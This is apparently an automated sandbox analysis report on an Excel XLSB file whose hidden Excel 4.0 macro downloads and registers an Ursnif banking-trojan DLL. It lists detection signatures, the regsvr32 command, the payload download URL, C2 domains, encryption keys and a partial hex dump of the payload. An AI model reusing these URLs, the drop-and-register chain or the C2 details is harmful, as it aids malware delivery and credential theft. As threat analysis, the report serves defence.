Loading ...

Play interactive tourEdit tour

Analysis Report 6613n246zm543w.xlsb

Overview

General Information

Sample Name:6613n246zm543w.xlsb
Analysis ID:403127
MD5:f5ac70a6e136e274a8856f244c9183b7
SHA1:3991a3a8ec56ee8487ff17e226c49f2355b9d3ac
SHA256:1f7a0472872d38133ce9fef933631d5110cf076ec44f344a95bd683e73fdbdc9
Tags:xlsb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Registers a DLL
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 7148 cmdline: regsvr32 -s C:\Users\Public\block.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 1260 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5696 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5828 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6384 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4996 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5368 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.regsvr32.exe.66db0000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              1.3.regsvr32.exe.41d8d29.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 1.2.regsvr32.exe.48494a0.2.raw.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\Public\block.dllReversingLabs: Detection: 12%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllReversingLabs: Detection: 12%
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr

                Software Vulnerabilities:

                barindex
                Document exploit detected (creates forbidden files)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to behavior
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: presentation[1].dll.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 17:48:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 03 May 2021 13:17:32 GMTAccept-Ranges: bytesContent-Length: 312832Cache-Control: max-age=10800Expires: Mon, 03 May 2021 20:48:15 GMThost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 d4 f0 e2 dc b5 9e b1 dc b5 9e b1 dc b5 9e b1 c2 e7 0b b1 cc b5 9e b1 c2 e7 1d b1 81 b5 9e b1 d5 cd 0d b1 d9 b5 9e b1 dc b5 9f b1 b4 b5 9e b1 c2 e7 1a b1 c3 b5 9e b1 c2 e7 0c b1 dd b5 9e b1 c2 e7 0a b1 dd b5 9e b1 c2 e7 0f b1 dd b5 9e b1 52 69 63 68 dc b5 9e b1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 df 48 6e 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 90 04 00 00 94 10 00 00 00 00 00 d2 3b 03 00 00 10 00 00 00 a0 04 00 00 00 00 01 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 15 00 00 04 00 00 aa f9 04 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 9f 04 00 54 00 00 00 9c 95 04 00 3c 00 00 00 00 20 15 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 15 00 d0 10 00 00 f0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 8f 04 00 00 10 00 00 00 90 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 71 10 00 00 a0 04 00 00 10 00 00 00 94 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 03 00 00 00 20 15 00 00 04 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 1d 00 00 00 30 15 00 00 1e 00 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: GET /presentation.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docs.atu.ngr.mybluehost.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: chat.billionady.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJg HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app3.maintorna.comConnection: Keep-Alive
                Source: msapplication.xml0.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                Source: msapplication.xml0.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                Source: msapplication.xml5.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                Source: msapplication.xml5.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                Source: msapplication.xml7.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                Source: msapplication.xml7.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                Source: unknownDNS traffic detected: queries for: docs.atu.ngr.mybluehost.me
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 03 May 2021 17:49:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                Source: {E4D8D280-AC37-11EB-90EB-ECF4BBEA1588}.dat.18.dr, ~DFEF08F5C4CE8758CE.TMP.18.drString found in binary or memory: http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf
                Source: {0D9072B2-AC38-11EB-90EB-ECF4BBEA1588}.dat.27.dr, ~DFC4112F6E645ECEC7.TMP.27.drString found in binary or memory: http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/
                Source: {FF57CED8-AC37-11EB-90EB-ECF4BBEA1588}.dat.24.dr, ~DFE7296AD5C85F4BE9.TMP.24.drString found in binary or memory: http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVK
                Source: sharedStrings.binString found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dll
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: msapplication.xml.18.drString found in binary or memory: http://www.amazon.com/
                Source: msapplication.xml1.18.drString found in binary or memory: http://www.google.com/
                Source: msapplication.xml2.18.drString found in binary or memory: http://www.live.com/
                Source: msapplication.xml3.18.drString found in binary or memory: http://www.nytimes.com/
                Source: msapplication.xml4.18.drString found in binary or memory: http://www.reddit.com/
                Source: msapplication.xml5.18.drString found in binary or memory: http://www.twitter.com/
                Source: msapplication.xml6.18.drString found in binary or memory: http://www.wikipedia.com/
                Source: msapplication.xml7.18.drString found in binary or memory: http://www.youtube.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.aadrm.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.cortana.ai
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.diagnostics.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.office.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.onedrive.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://augloop.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://augloop.office.com/v2
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cdn.entity.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://config.edge.skype.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cortana.ai
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cortana.ai/api
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cr.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dev.cortana.ai
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://devnull.onenote.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://directory.services.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://graph.windows.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://graph.windows.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
